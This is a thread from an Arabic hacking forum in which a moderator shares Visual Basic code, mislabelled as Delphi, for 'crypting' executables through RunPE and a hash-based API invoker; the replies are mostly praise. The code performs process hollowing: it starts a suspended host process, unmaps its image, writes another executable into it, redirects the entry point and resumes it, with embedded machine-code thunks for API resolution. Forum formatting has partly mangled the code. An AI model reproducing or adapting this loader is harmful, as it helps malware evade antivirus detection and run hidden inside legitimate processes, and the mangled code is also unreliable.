1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : !»°بہًكہًر الہًعہًراقہًي°«! | المشاهدات : 843 | الردود : 30
حالة الموضوع:
مغلق
  1. !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм مراقب عآم

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    638
    الإعجابات المتلقاة:
    1,416
    نقاط الجائزة:
    515
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    [​IMG]
    كيف الحال اعضاء وزوار عراق تيم انشاء تكونوا بصحه وسلامه

    ------------
    [​IMG]
    شرح اليوم التشفير بالدلفي بطريقه جديده حصريا على ارض الابداع عراق تيم


    التشفير عن طريق استخدام
    RunPe + Invoke


    طبعا لم يتسنى لي وقت لاعمل فديو لاني مستعجل انو هذا اخر موضوع لي لحد شهر الثامن بسب الامتحانات


    اتركم مع الاكواد


    الكود
    كود PHP:
    Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As CurrencyOptional ByVal lP1 As LongOptional ByVal lP2 As LongOptional ByVal lP3 As LongOptional ByVal lP4 As Long) As LongDeclare Function ExeThunk Lib "user32" Alias "CallWindowProcW" (ByVal Address As AnyOptional ByVal Param1 As LongOptional ByVal Param2 As LongOptional ByVal Param3 As LongOptional ByVal Param4 As Long) As LongDeclare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef A As AnyOptional ByVal B As Long 1Optional ByVal c As Long 1) As LongPrivate ASM_GETAPIPTR(170)            As BytePrivate ASM_CALLCODE(255)              As BytePrivate sMEMORY(40)                    As BytePrivate sVALUE                        As BytePrivate IMAGE_DOS_HEADER(65)          As BytePrivate IMAGE_NT_HEADERS(256)          As BytePrivate IMAGE_SECTION_HEADER(60)      As BytePrivate PROCESS_INFORMATION(44)        As BytePrivate tCONTEXT(210)                  As BytePrivate STARTUPINFO(16)                As LongPrivate sParams                        As LongPrivate ImageBase                      As LongPrivate hProcess                      As LongPrivate hThread                        As LongPrivate SizeOfImage                    As LongPrivate SizeOfHeaders                  As LongPrivate sEntryPoint                    As LongPrivate VirtualAddress                As LongPrivate sRawDataPoint                  As LongPrivate sRawData                      As LongPrivate Ebx                            As LongPrivate D                              As LongPrivate Z                              As LongPrivate vItem                          As VariantPrivate sSection                      As Integer

    Public Function sInject(ByVal sHost As StringByRef sBytes() As Byte)

    For 
    Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1_&HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)
    sMEMORY(Z) = vItem
    1
    sVALUE 
    200 48
    Next

    Call MoveMemory
    (sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
    Call MoveMemory(sMulDiv(tCONTEXT(0)), sMulDiv(&H10007), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(0)), sMulDiv(sBytes(0)), &H72)
    Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(0)), sMulDiv(sBytes(sParams)), 256)
    Call MoveMemory(sMulDiv(ImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
    Call Invoke("KERNEL32""CreateProcessW"0StrPtr(sHost), 00, &H1, &H400sMulDiv(STARTUPINFO(0)), sMulDiv(PROCESS_INFORMATION(0)))
    Call MoveMemory(sMulDiv(hProcess), sMulDiv(PROCESS_INFORMATION(0)), &H1 + &H3)
    Call MoveMemory(sMulDiv(hThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
    Call Invoke("NTDLL""NtUnmapViewOfSection"hProcessImageBase)
    Call Invoke("KERNEL32""VirtualAllocEx"hProcessImageBaseSizeOfImage, &H3000&, &H40)
    Call Invoke("NTDLL""NtWriteVirtualMemory"hProcessImageBasesMulDiv(sBytes(0)), SizeOfHeadersCLng("0"))
    For 
    0 To sSection 1
    Call MoveMemory
    (sMulDiv(IMAGE_SECTION_HEADER(0)), sMulDiv(sBytes(sParams sVALUE 40& * D)), &H64)
    Call MoveMemory(sMulDiv(VirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
    Call Invoke("NTDLL""NtWriteVirtualMemory"hProcessImageBase VirtualAddresssMulDiv(sBytes(sRawDataPoint)), sRawDataCLng("0"))
    Next
    Call Invoke
    ("NTDLL""NtGetContextThread"hThreadsMulDiv(tCONTEXT(CLng("0"))))          Call Invoke("NTDLL""NtWriteVirtualMemory"hProcessEbx + &H4 + &H1 + &H3sMulDiv(VirtualAddress), &H1 + &H3 + &H2CLng("0"))
    Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(ImageBase sEntryPoint), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(sParams), sMulDiv(tCONTEXT(176)), &H5)
    Call Invoke("NTDLL""NtSetContextThread"hThreadsMulDiv(tCONTEXT(0)))
    Call Invoke("NTDLL""NtResumeThread"hThreadCLng("0"))
    End Function
    Public 
    Sub MoveMemory(ByVal lpDest As LongByVal lpSource As LongByVal cBytes As Long)      ExeThunk sMulDiv(sMEMORY(0)), lpDestlpSourcecBytesCLng("0")  End Sub
    Function Invoke(ByVal sDLL As StringhHash As StringParamArray vParams() As Variant) As Long
    On Error Resume NextDim vItem                      
    As VariantDim sThunk                      As String
    Call PutThunk
    (THUNK_GETAPIPTRASM_GETAPIPTR)
    For 
    Each vItem In vParamssThunk "68" GetLng(vItem) & sThunkNext vItem
    Call PutThunk
    (sThunk "B8" GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _StrPtr(sDLL), gHash(hHash))) & "FFD0C3" sThunkASM_CALLCODE)
    Invoke ExeThunk(VarPtr(ASM_CALLCODE(0)))

    End Function
    Private Function 
    gHash(strHash) As LongOn Error Resume Next
    Dim i          
    As LongDim lResult    As Long
    For 1 To Len(strHash)lResult CallThunk8(-439163333029263.6533@, lResult)lResult lResult Asc(Mid(strHashi1))Next igHash "&H" String(Len(Hex(lResult)), "0") & Hex(lResult)

    End Function
    Private Function 
    GetLng(ByVal lLng As Long) As StringOn Error Resume NextDim lTMP                        As LonglTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000' by Mike D SuttonIf (lLng And &H80&) Then lTMP = lTMP Or &H80000000GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)End Function
    Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)On Error Resume NextDim i                          As LongFor i = 0 To Len(sThunk) - 1 Step 2bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))Next iEnd Sub
    Function THUNK_GETAPIPTR() As StringTHUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"End Function
    الى هنا انتهى الشرح انتمى ان يكون نال اعجباكم دعواتكم بالنجاح لنعود اليكم بمواضيع جديده وحصريا على عراق تيم
    اتركم براعيه الله
    [​IMG]
    امير ايكل


    المعاقب الصدري


    ملخد هكسور


    محمد العراقي


    وفي الاخير رحم الله من قراء سوره الفاتحه على روح اخي وحبيبي علي الصقور

     
  2. Unico Nico Developer

    الأنتساب:
    ‏7 مايو 2012
    المشاركات:
    43
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    Algerie,Mascara
    نظام التشغيل:
    Linux
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    يعطيك الف عافية #
     
  3. لعنة الهكرز Developer

    الأنتساب:
    ‏12 مارس 2013
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    تسلم يدك شاكرين مجهودك​
     
  4. Mohmaed مراقب عآم

    الأنتساب:
    ‏12 ابريل 2015
    المشاركات:
    605
    الإعجابات المتلقاة:
    482
    نقاط الجائزة:
    515
    نظام التشغيل:
    windows 10
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    عشت حبيبي ستمر الله يرحمك عزيزي علاوي
     
  5. !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм مراقب عآم

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    638
    الإعجابات المتلقاة:
    1,416
    نقاط الجائزة:
    515
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    نورتو اصدقائي تحياتي للجميع
     
  6. علي الواسطي DeveloPer Plus

    الأنتساب:
    ‏13 يناير 2015
    المشاركات:
    159
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الوظيفة:
    طالب
    الإقامة:
    iraq
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    مببببببدع عاشت ايدك
    .
    .
    .
    الله يرحمه ويدخله فسيح جناته :(
     
  7. !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм مراقب عآم

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    638
    الإعجابات المتلقاة:
    1,416
    نقاط الجائزة:
    515
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:

    تسلم خويه ويرحم اموات المسلمين جميعا
     
  8. Girl - SilenT <span style="font-weight: bold; text-shadow: #BBBB مشرفات المنتدى

    الأنتساب:
    ‏1 ابريل 2015
    المشاركات:
    236
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Perl
    Facebook:
    YouTube:
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    عاشت ايدك ع موضوع استمر يامبدع


    تحياتي


    :{1!}:
     
  9. Someone Developer

    الأنتساب:
    ‏15 أغسطس 2014
    المشاركات:
    24
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    هذا مو دلفي
    oh god why.
     
  10. !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм مراقب عآم

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    638
    الإعجابات المتلقاة:
    1,416
    نقاط الجائزة:
    515
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    نورتي الموضوع اختي
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة